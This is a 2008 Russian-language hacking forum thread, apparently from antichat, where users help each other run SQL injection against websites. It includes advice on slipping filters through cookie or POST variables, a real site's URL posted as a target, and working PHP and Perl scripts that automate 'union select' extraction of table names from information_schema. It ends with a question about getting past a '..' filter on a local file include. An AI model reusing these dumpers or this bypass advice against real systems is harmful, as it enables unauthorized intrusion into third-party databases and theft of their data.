26.01.2008, 00:34
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
не свеб.ру?) попробуй передать через кукисы, пост.. на свебе например фильтр только на гетовые переменные
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
26.01.2008, 00:40
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Сообщение от blackybr
не свеб.ру?) попробуй передать через кукисы, пост.. на свебе например фильтр только на гетовые переменные
не, не свеб.ру, т.е. передать через кукисы, попробывать внедрить инекцию в переменные куксов? а если куксов нет на сайте  можно как нибудь зашифровать?
|
|
|
|
26.01.2008, 00:42
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
допустим переменная xek=123
то ты также пробуешь передать ее или постом.. или в кукисах..
union и select никак не обойдешь.. правда если на селект нет фильтра то можно подзапросами, или на оба ?
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
26.01.2008, 00:46
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
да, на оба
blackybr:
тогда напрямую обойти не получится.
естественно я этого не утверждаю, т.к. не знаю что там за код.. а вслепую врядли.
|
|
|
|
27.01.2008, 00:26
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
Провел на форуме:
905389
Репутация:
332
|
|
помогите плиз с этим:
http://www.uralweb.ru/rating/index.php?rating_sel="123
|
|
|
|
27.01.2008, 00:49
|
|
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
Провел на форуме:
2030482
Репутация:
1796
|
|
Там посимвольный брут вот http://forum.antichat.ru/showpost.php?p=565034&postcount=4 тебе в руки.
__________________
Кто я?..
|
|
|
|
27.01.2008, 03:08
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 24
Провел на форуме:
60954
Репутация:
3
|
|
Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
|
|
|
|
27.01.2008, 18:33
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Сообщение от Derec
Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
банальный дампер на пхп или перл, учти что в логах будет много какашек
скрипт:
PHP код:
<?php
set_time_limit(0);
ignore_user_abort(true);
$s=1;
$f=39913;
$fph = fopen ("result.txt", 'a+');
for ($i=$s; $i<=$f; $i++) {
$aps = file_get_contents("[твой сайт и путь до уязвимого скрипта]=-1+union+select+concat(0x3a3a3a,table_name,0x3a3a3a)+from+information_schema.tables+limit+".$i.",1/*");
$res=null;
$pattern ="/:::(.+):::/";
preg_match_all($pattern, $aps, $out);
$res=array_values(array_unique($out[0]));
fputs ($fph, $res[0]."\r\n");
sleep (5);
}
fclose ($fph);
?>
а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться?
Писать не хрень, а запрос мб?
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 27.01.2008 в 19:42..
|
|
|
|
27.01.2008, 19:28
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Derec
Скажите пожалуйста, если таблицы выводятся посредством limit, и их очень много, как можно автоматизировать процесс?
Полчаса назад писал для себя:
PHP код:
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$x=0;
$y = $ARGV[0];
open(TT,">","mda.txt") or die "$!";
while ($x<=$y)
{
$omfg = $ua->get("СКУЕЛЬ")->content;
$omfg =~m%:::(.*?):::%i)
$table = $1;
print TT $table, "\n";
$x++;
}
close TT;
В get("СКУЕЛЬ") должна быть скуль вида:
http://site.com/index.php?id=1+union+select+ concat(0x3a3a3a,table_name ,0x3a3a3a)+from+information_schema.tables+limit+ $x,1/*
Участки выделенные красным обязательны в запросе. Запускаешь скрипт, вводишь кол-во таблиц/полей/ещё чего то, которое нужно сдампить. Всё сохраняет в текстовик mda.txt
ЗЫ Писалось на скорую руку для себя, так что любители дое*аться к коду идут лесом(:
Последний раз редактировалось .Slip; 27.01.2008 в 22:10..
Причина: переделал под запуск с шелла
|
|
|
|
27.01.2008, 03:40
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
помогите ребята с скуль иньекцией.
Если ввожу адрес:
modules.php?name=News&pagenum=2'
то вылазит ошибка:
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '192.168.137.'' at line 1
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/modules.php?name=News&pagenum=2'')' at line
а если пишу всякую хрень БЕЗ ковычки, то ошибки нету... Можно ли этоим воспользоваться?
и ещё вопрос: если есть локальный инклуд, но фильтруются .. (две подряд идущие точки), то можно ли воспользоваться этим инклудом, если необходимо подняться на несколько уровней вверх? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
